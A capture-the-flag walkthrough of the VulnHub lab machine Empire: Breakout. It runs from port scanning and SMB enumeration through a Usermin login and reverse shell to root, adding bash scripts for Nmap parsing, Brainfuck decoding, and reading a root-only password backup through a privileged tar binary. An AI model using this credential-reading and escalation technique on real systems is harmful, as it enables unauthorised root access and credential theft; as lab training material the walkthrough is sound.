In my previous article we completed the first vulnerable box of the Empire series, Empire: LupinOne (see "Empire: LupinOne - VulnHub Complete Walkthrough" for the enumeration, exploitation and post-exploitation of that machine).
Empire: Breakout is an easy-rated vulnerable machine designed by icex64 and Empire Cybersecurity.
Setting Up
First, download the zip file from VulnHub and extract it; the archive contains the virtual disk (.vmdk) we need.
Launch VirtualBox and click New to create a new virtual machine.
Fill in the name, type, and version.
Click Next, choose the memory size, and then browse to the .vmdk file in the extracted directory.
On completion, check that the Network Adapter is set to Host-only Adapter, so the VM is reachable from the attacking machine but not exposed to any other network.
Once the settings are done, start the VM.
The instance boots to a console login prompt asking for a password. We have no credentials yet, so everything from here on happens over the network.
Enumeration
Our first step is to find the target's IP address on the host-only network using netdiscover.
From the scan, we have discovered the target IP address: 192.168.56.108.
Now that we have the IP address, the next step is a port scan to find out which services are exposed. This is an essential part of enumeration: it maps the attack surface and lets us plan targeted attacks. As in most cases, we use Nmap:
Conducting Network Scans with Nmap
- -p- : scan all 65535 TCP ports, not only Nmap's default top 1000
- -A : enable OS detection, version detection, default script scanning, and traceroute
- -T<0-5> : timing template; -T4 is the usual choice on a lab network (faster, but noisier)
From the Nmap output, we have spotted five open ports:
- Port 80/TCP running an HTTP service, which indicates there is a website.
- Ports 139/TCP and 445/TCP both running netbios-ssn, i.e. Samba (SMB).
- Ports 10000/TCP and 20000/TCP both running HTTP services; as we see below, these are Webmin and Usermin.
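The scan the article describes, followed by a parser for Nmap's greppable (-oG) output so the open ports can be pulled out without reading the whole report. This is an added example, not code from the original walkthrough; the target IP is the one found above and the sample .gnmap line is constructed data (no version strings), used so the parser can be exercised offline.

```bash
#!/usr/bin/env bash
# Added example: full-port Nmap scan plus a parser for the -oG report.
# The target address and the SAMPLE_GNMAP line below are assumptions / constructed data.

scan_target() {
    local target="$1"
    # -p-  all 65535 TCP ports, not just Nmap's default top 1000
    # -A   OS detection, version detection, default NSE scripts, traceroute
    # -T4  aggressive timing template (fine on a host-only lab network)
    # -oN  human-readable report, -oG greppable report for parsing
    nmap -p- -A -T4 -oN "scan_${target}.nmap" -oG "scan_${target}.gnmap" "$target"
}

# Read a .gnmap report on stdin and print "port/proto service" for each open port.
# Greppable port entries look like: 80/open/tcp//http///
# i.e. port/state/proto/owner/service/rpc/version/ separated by ", ".
open_ports() {
    grep -E '^Host: .*Ports: ' \
        | sed -e 's/.*Ports: //' -e 's/[[:space:]]*Ignored State:.*//' \
        | tr ',' '\n' \
        | sed -e 's/^[[:space:]]*//' \
        | awk -F/ '$2 == "open" { printf "%s/%s %s\n", $1, $3, $5 }'
}

# Constructed sample of what the Breakout scan line looks like; the closed port 22
# entry is there only to show that non-open states are filtered out.
SAMPLE_GNMAP=$'Host: 192.168.56.108 ()\tPorts: 80/open/tcp//http///, 139/open/tcp//netbios-ssn///, 445/open/tcp//netbios-ssn///, 10000/open/tcp//http///, 20000/open/tcp//http///, 22/closed/tcp//ssh///\tIgnored State: closed (65529)'

main() {
    local target="$1"
    scan_target "$target"
    open_ports < "scan_${target}.gnmap"
}

# Only scan when a target is given on the command line; otherwise the functions
# can be sourced, e.g. to run open_ports over an existing report.
if [ "$#" -gt 0 ]; then main "$@"; fi
```

Run it as `./scan.sh 192.168.56.108`. The parser splits entries on commas, which is fine for service names but would mis-split a version string that itself contains a comma; check the -oN report when something looks odd.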
Web Enumeration
Let's look at the contents ourselves: open a web browser of your choice and navigate to the target's IP address in the URL bar.
The site is the default Apache2 Debian page. Nothing seems interesting at first glance (we will come back to its source code later), so let's take a look at the other two ports.
Port 10000 shows a login form for Webmin (port 20000 serves its user-facing counterpart, Usermin). With valid credentials, either would give us login access and a foothold on the server.
Foothold
From the Nmap scan, we have spotted two open ports running Samba (netbios-ssn).
I have a write-up on this service in which I walk through enumerating and exploiting SMB on ports 139 and 445. If you have not read it, see: Exploiting SMB (Samba) - Port 139 and Port 445.
Enumerating SMB (Samba) with enum4linux
Let's enumerate the SMB service using enum4linux. It is basically a wrapper around the Samba-suite tools (smbclient, rpcclient, net and nmblookup) and quickly pulls users, shares and policy information out of the target.
From the output, we identified a local user, cyber, which is a likely username for Webmin/Usermin. We now have a username and only need the password.
If you look at the page source of the Apache2 Debian default page, you will find a hidden block of text made up only of the characters + - < > [ ] and . (dot).
This is not an encrypted message but a Brainfuck program: running it prints the hidden text.
Decoding the Brainfuck Program
Paste the program into any Brainfuck interpreter (an online decoder works, and so does a few lines of local code) and run it.
The output is a password.
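A small Brainfuck interpreter in bash, so the string taken from the page source can be decoded on the attacking machine rather than pasted into a third-party website (a habit worth keeping for anything that might be a real credential). This is an added example, not the article's own code; the eight Brainfuck commands are standard, the tape is unbounded to the right, and the `,` input command is ignored because a decoder never needs it.

```bash
#!/usr/bin/env bash
# Added example: minimal Brainfuck interpreter for decoding the string found in
# the page source. Usage: decode_bf 'PROGRAM'   or   decode_bf "$(cat program.bf)"

decode_bf() {
    local prog="$1"
    local -a tape jump stack
    local n=${#prog} i c top

    # Pre-compute matching bracket positions so loop jumps are O(1) and an
    # unbalanced program is rejected before anything runs.
    for ((i = 0; i < n; i++)); do
        c=${prog:i:1}
        if [[ $c == '[' ]]; then
            stack+=("$i")
        elif [[ $c == ']' ]]; then
            if [ "${#stack[@]}" -eq 0 ]; then
                echo "unbalanced ']' at offset $i" >&2; return 1
            fi
            top=$(( ${#stack[@]} - 1 ))
            jump[$i]=${stack[$top]}
            jump[${stack[$top]}]=$i
            unset "stack[$top]"
        fi
    done
    if [ "${#stack[@]}" -ne 0 ]; then
        echo "unbalanced '[' in program" >&2; return 1
    fi

    local ptr=0 pc=0 out="" ch val
    while [ "$pc" -lt "$n" ]; do
        c=${prog:pc:1}
        val=${tape[$ptr]:-0}          # unset cells read as 0
        case $c in
            '>') ptr=$((ptr + 1)) ;;
            '<') if [ "$ptr" -eq 0 ]; then echo "tape underflow" >&2; return 1; fi
                 ptr=$((ptr - 1)) ;;
            '+') tape[$ptr]=$(( (val + 1) % 256 )) ;;       # 8-bit cells wrap
            '-') tape[$ptr]=$(( (val + 255) % 256 )) ;;
            '.') printf -v ch "\\$(printf '%03o' "$val")"   # byte -> character
                 out+=$ch ;;
            '[') if [ "$val" -eq 0 ]; then pc=${jump[$pc]}; fi ;;
            ']') if [ "$val" -ne 0 ]; then pc=${jump[$pc]}; fi ;;
            *)   ;;   # ',' (input) and any non-command byte are ignored
        esac
        pc=$((pc + 1))
    done
    printf '%s' "$out"
}
```

Save the text from the page source to a file and run `decode_bf "$(cat program.bf)"`; anything that is not one of the eight command characters (whitespace, HTML comment markers) is skipped, so the block can be pasted as-is.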
Establishing Reverse Shell Access Through the Usermin Command Shell
Now that we have a valid username and password, let's try to log in to the web portal on port 20000.
The login was successful and we are presented with the Usermin dashboard.
In the Usermin dashboard, open Login >> Command Shell.
Run ls to list the directory contents; you will find user.txt, the first flag. Read it with cat.
This web command shell is awkward to work in, so let's use a Bash reverse shell to get a proper shell on our own machine.
Before running it, start a Netcat listener on the port you put in the payload (4242 here).
On successful execution, the listener on port 4242 receives a shell running as cyber, the user we logged in as.
Since this is not the root user, let's gather further information about the target that could help us gain root access.
Privilege Escalation
Let's check the current user's sudo rights with sudo -l:
The command is not found: sudo is not installed on this box, so there are no sudo rules to abuse.
Privilege Escalation by Reading a Root-only Backup with tar
Without root we cannot install it, so we have to find a local way to escalate privileges.
Since the instance runs web servers and backups of configuration are common, let's look at the files and directories under /var. There is a backups directory, so take a look at its content.
It contains old_pass.bak, but our user has no permission to read it.
If you look back at the earlier listing of the home directory, you will have noticed a tar binary there, owned by root. What matters is not its mode bits but what that binary is allowed to read: check it with ls -l and getcap, because a file capability such as cap_dac_read_search lets a program read any file regardless of its permissions. A tar that can read files we cannot is enough, since whatever it can read it can also write into an archive that we own.
What is tar?
Tar is a computer software utility for collecting many files into one archive file, often referred to as a tarball, for distribution or backup purposes.
Let's use that tar to create an archive, backup.tar, containing the unreadable old_pass.bak.
On successful execution, a tar archive appears in the current directory. Extract it with the normal tar and look at the file inside.
From the output, we have a password. Let's use it to switch to the root user with su.
Finally, we have a root shell, as the id command confirms.
Now change directory to /root to obtain the root flag.
Congratulations, both flags have been captured.
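The archive-and-extract trick as a script, added here as an example and not taken from the article. PRIV_TAR stands for the privileged tar found on the box (an assumed path; on Breakout it sits in the home directory); it defaults to the system tar and the script runs against a constructed file in a temporary directory, so the mechanics can be checked offline before they are used on the target.

```bash
#!/usr/bin/env bash
# Added example: read a file the current user cannot open by archiving it with a
# tar binary that can, then extracting the archive into a directory we own.
# PRIV_TAR (assumed path on the box: ./tar in the home directory) defaults to the
# system tar so this runs offline against constructed data.

# Why can this binary read what we cannot? Owner/mode and file capabilities both matter.
inspect_binary() {
    ls -l "$1"
    if command -v getcap >/dev/null 2>&1; then
        getcap "$1"    # e.g. cap_dac_read_search bypasses read permission checks
    fi
}

# Archive TARGET with PRIV_TAR, extract the archive into WORKDIR with the ordinary
# tar, and print the recovered file.
dump_via_tar() {
    local priv_tar="$1" target="$2" workdir="$3"
    local archive="$workdir/backup.tar"
    # The privileged tar does the reading. tar strips the leading '/' from member
    # names, so the file reappears under $workdir with its original path.
    "$priv_tar" -cf "$archive" "$target"
    tar -xf "$archive" -C "$workdir"
    cat "$workdir/${target#/}"
}

# Offline demonstration on a constructed "backup" file.
demo() {
    local secret_dir workdir result
    secret_dir=$(mktemp -d)
    workdir=$(mktemp -d)
    printf 'constructed-demo-password\n' > "$secret_dir/.old_pass.bak"
    chmod 600 "$secret_dir/.old_pass.bak"   # readable by us here; root-only on the box
    result=$(dump_via_tar "${PRIV_TAR:-tar}" "$secret_dir/.old_pass.bak" "$workdir")
    rm -rf "$secret_dir" "$workdir"
    printf '%s' "$result"
}
```

On the box the call becomes `dump_via_tar /home/cyber/tar /var/backups/old_pass.bak /tmp/work` (paths assumed), and the recovered string is what you hand to `su root`. Extracting with `-C` into a fresh directory keeps the archive from overwriting anything you care about.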